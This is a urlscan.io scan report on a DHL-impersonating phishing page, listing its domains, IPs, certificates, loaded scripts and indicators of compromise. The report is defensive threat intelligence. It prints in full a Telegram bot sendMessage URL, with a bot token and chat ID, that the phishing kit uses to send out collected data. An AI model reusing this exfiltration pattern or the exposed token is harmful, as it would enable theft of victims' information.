kivoga.wordifysites.com
Open in
urlscan Pro
35.208.63.255
Malicious Activity!
Public Scan
Submission: On July 23 via api from US — Scanned from US
Summary
TLS certificate: Issued by E6 on July 23rd 2024. Valid for: 3 months.
This is the only time kivoga.wordifysites.com was scanned on urlscan.io!
urlscan.io Verdict: Potentially Malicious
Targeting these brands: DHL (Transportation)Domain & IP information
IP Address | AS Autonomous System | ||
---|---|---|---|
18 | 35.208.63.255 35.208.63.255 | 15169 (GOOGLE) (GOOGLE) | |
1 | 104.21.234.145 104.21.234.145 | 13335 (CLOUDFLAR...) (CLOUDFLARENET) | |
3 | 135.181.58.223 135.181.58.223 | 24940 (HETZNER-AS) (HETZNER-AS) | |
23 | 4 |
ASN15169 (GOOGLE, US)
PTR: 255.63.208.35.bc.googleusercontent.com
kivoga.wordifysites.com |
ASN24940 (HETZNER-AS, DE)
PTR: white.hostingcolor.com
dispatching-centre.lasamericascargo.com |
Apex Domain Subdomains |
Transfer | |
---|---|---|
18 |
wordifysites.com
kivoga.wordifysites.com |
302 KB |
3 |
lasamericascargo.com
dispatching-centre.lasamericascargo.com |
37 KB |
1 |
lr-in.com
cdn.lr-in.com — Cisco Umbrella Rank: 52298 |
175 KB |
0 |
telegram.org
Failed
api.telegram.org Failed |
|
23 | 4 |
Domain | Requested by | |
---|---|---|
18 | kivoga.wordifysites.com |
kivoga.wordifysites.com
|
3 | dispatching-centre.lasamericascargo.com |
kivoga.wordifysites.com
|
1 | cdn.lr-in.com |
kivoga.wordifysites.com
|
0 | api.telegram.org Failed |
kivoga.wordifysites.com
|
23 | 4 |
This site contains no links.
Subject Issuer | Validity | Valid | |
---|---|---|---|
kivoga.wordifysites.com E6 |
2024-07-23 - 2024-10-21 |
3 months | crt.sh |
lr-in.com WE1 |
2024-07-05 - 2024-10-03 |
3 months | crt.sh |
dispatching-centre.lasamericascargo.com cPanel, Inc. Certification Authority |
2024-05-08 - 2024-08-06 |
3 months | crt.sh |
This page contains 1 frames:
Primary Page:
https://kivoga.wordifysites.com/wp-admin/infos/home.php?enc=319ba6cae2f7b5f0d7b49ba1c2e9683e&p=0&dispatch=04e637e3e13fe2de19ee5a91bf65b662048df315
Frame ID: 835C2E5D8AF28C4D36CC5ED7F318FD27
Requests: 23 HTTP requests in this frame
Screenshot
Page Title
Verification | DHLDetected technologies
PHP (Programming Languages) ExpandDetected patterns
- \.php(?:$|\?)
Font Awesome (Font Scripts) Expand
Detected patterns
- (?:F|f)o(?:n|r)t-?(?:A|a)wesome(?:.*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)
jQuery (JavaScript Libraries) Expand
Detected patterns
- jquery[.-]([\d.]*\d)[^/]*\.js
- jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?
Page Statistics
0 Outgoing links
These are links going to different origins than the main page.
Redirected requests
There were HTTP redirect chains for the following requests:
23 HTTP transactions
Method Protocol |
Resource Path |
Size x-fer |
Type MIME-Type |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
GET H2 |
Primary Request
home.php
kivoga.wordifysites.com/wp-admin/infos/ |
75 KB 11 KB |
Document
text/html |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
app.css
kivoga.wordifysites.com/wp-admin/infos/assets/ |
405 KB 72 KB |
Stylesheet
text/css |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H3 |
logger-1.min.js
cdn.lr-in.com/ |
869 KB 175 KB |
Script
text/javascript |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
logo.png
kivoga.wordifysites.com/wp-admin/infos/assets/ |
2 KB 2 KB |
Image
image/png |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
col.png
kivoga.wordifysites.com/wp-admin/infos/assets/ |
682 B 1 KB |
Image
image/png |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
pak.png
kivoga.wordifysites.com/wp-admin/infos/assets/ |
380 B 1 KB |
Image
image/png |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
clan.png
kivoga.wordifysites.com/wp-admin/infos/assets/ |
475 B 1 KB |
Image
image/png |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
alert.png
kivoga.wordifysites.com/wp-admin/infos/assets/ |
469 B 1 KB |
Image
image/png |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
foo.png
kivoga.wordifysites.com/wp-admin/infos/assets/ |
17 KB 17 KB |
Image
image/png |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
jquery-3.5.1.min.js
kivoga.wordifysites.com/wp-admin/infos/assets/ |
87 KB 35 KB |
Script
application/javascript |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
jquery.mask.js
kivoga.wordifysites.com/wp-admin/infos/assets/ |
23 KB 7 KB |
Script
application/javascript |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
jquery.main.js
kivoga.wordifysites.com/wp-admin/infos/assets/ |
437 KB 152 KB |
Script
application/javascript |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
app.js
kivoga.wordifysites.com/js/ |
0 0 |
Script
text/html |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
session-recorder.js
kivoga.wordifysites.com/js/ |
0 0 |
Script
text/html |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H/1.1 |
card.js
dispatching-centre.lasamericascargo.com/js/ |
57 KB 14 KB |
Script
application/javascript |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H/1.1 |
intlTelInput.js
dispatching-centre.lasamericascargo.com/js/ |
87 KB 21 KB |
Script
application/javascript |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
roboto-latin-400-normal.woff2
kivoga.wordifysites.com/fonts/vendor/@fontsource/roboto/files/ |
0 0 |
Font
text/html |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
webfa-solid-900.woff2
kivoga.wordifysites.com/fonts/vendor/@fortawesome/fontawesome-free/ |
0 0 |
Font
text/html |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
roboto-all-400-normal.woff
kivoga.wordifysites.com/fonts/vendor/@fontsource/roboto/files/ |
0 0 |
Font
text/html |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
webfa-solid-900.woff
kivoga.wordifysites.com/fonts/vendor/@fortawesome/fontawesome-free/ |
0 0 |
Font
text/html |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H2 |
webfa-solid-900.ttf
kivoga.wordifysites.com/fonts/vendor/@fortawesome/fontawesome-free/ |
0 0 |
Font
text/html |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET |
sendMessage
api.telegram.org/bot6629111591:AAE4ri_4SAIi7eHl3F1gDfzQXKw_93JXlx8/ |
0 0 |
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
GET H/1.1 |
favicon.gif
dispatching-centre.lasamericascargo.com/images/ |
2 KB 2 KB |
Other
image/gif |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
General
Request headers
Response headers
|
Failed requests
These URLs were requested, but there was no response received. You will also see them in the list above.
- Domain
- api.telegram.org
- URL
- https://api.telegram.org/bot6629111591:AAE4ri_4SAIi7eHl3F1gDfzQXKw_93JXlx8/sendMessage?chat_id=-1001814885404&text=Server%20Location:https://kivoga.wordifysites.com/wp-admin/infos/home.php?enc=319ba6cae2f7b5f0d7b49ba1c2e9683e&p=0&dispatch=04e637e3e13fe2de19ee5a91bf65b662048df315&_=1721727988541
Verdicts & Comments Add Verdict or Comment
Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!
urlscan
Phishing against: DHL (Transportation)20 JavaScript Global Variables
These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.
function| $ function| jQuery object| regeneratorRuntime object| __SDKCONFIG__ function| _LRLogger function| _0x51e0 function| _0x5f36 function| _0x18d4c3 string| sessionHash number| visitId string| fingerprint function| openNav function| closeNav object| jQuery11110723991451587888 function| card function| Payment function| Card object| intlTelInputGlobals function| intlTelInput function| getRandomInt1 Cookies
Cookies are little pieces of information stored in the browser of a user. Whenever a user visits the site again, he will also send his cookie values, thus allowing the website to re-identify him even if he changed locations. This is how permanent logins work.
Domain/Path | Expires | Name / Value |
---|---|---|
kivoga.wordifysites.com/ | Name: PHPSESSID Value: stgiklc39hbvdjn0b11j0od55v |
7 Console Messages
A page may trigger messages to the console to be logged. These are often error messages about being unable to load a resource or execute a piece of JavaScript. Sometimes they also provide insight into the technology behind a website.
Source | Level | URL Text |
---|
Security Headers
This page lists any security headers set by the main page. If you want to understand what these mean and how to use them, head on over to this page
Header | Value |
---|---|
Content-Security-Policy | block-all-mixed-content |
Strict-Transport-Security | max-age=31536000 |
X-Content-Type-Options | nosniff |
X-Frame-Options | SAMEORIGIN |
X-Xss-Protection | 1 |
Indicators
This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.
api.telegram.org
cdn.lr-in.com
dispatching-centre.lasamericascargo.com
kivoga.wordifysites.com
api.telegram.org
104.21.234.145
135.181.58.223
35.208.63.255
0697cd4b48bf96c303a25c24d3a7581b873ce34b2edf57b618c5d352e2654797
078269ddc9e025d1f62213f54550e4734e252f7dda7c5f3c3922360af9886ff6
18c4b9b4c27233b541a47300a4ee98239e1f8dec4bbcd9fabb6bdad12ca82025
381941fc8b5df86879d6e2fcf3392d281b796c33f430f045405a0e6af0e474b9
3f0c62b5ccdcdbf3b3ae3885f1e6959e2d937eba9b29dea9a6bdb98788041756
691ff3918fb72cddc3abf2b84af0d66e0d2875b18b032ef6864923789c7e4077
a0b9419777f544b665051cae80f11bf8ff9f925072a9f062a3d82c383e6cdfde
a199620fe981df00a825f78761d3f7c8870f8117daa4a890e08018dec386dae8
b0dbd00f3650fa6b931e678a9d8f79a405d23c7adf111ab91b1a01a0e7109807
b36e63b78f7ab077c9f74269deec4010ae803b687b27ca13e6aa58712520bb84
b8b7e6c193f0b11bece8c12b305cbf15130bc99b32ae92426eb747a3da3264d6
cae9d5adf2b0220c74a93b644c26d53e27c3a87f9b5d3fe57d06442e808074a2
d2f26bb154de8bd8a6fe61b50dba088aa332f360db5123b39a336d83917d15c5
eb6ca62c1e5d64c52be3ffa63c298dcda2483c04c4b17d1bfe605d134e52f91b
f7f6a5894f1d19ddad6fa392b2ece2c5e578cbf7da4ea805b6885eb6985b6e3d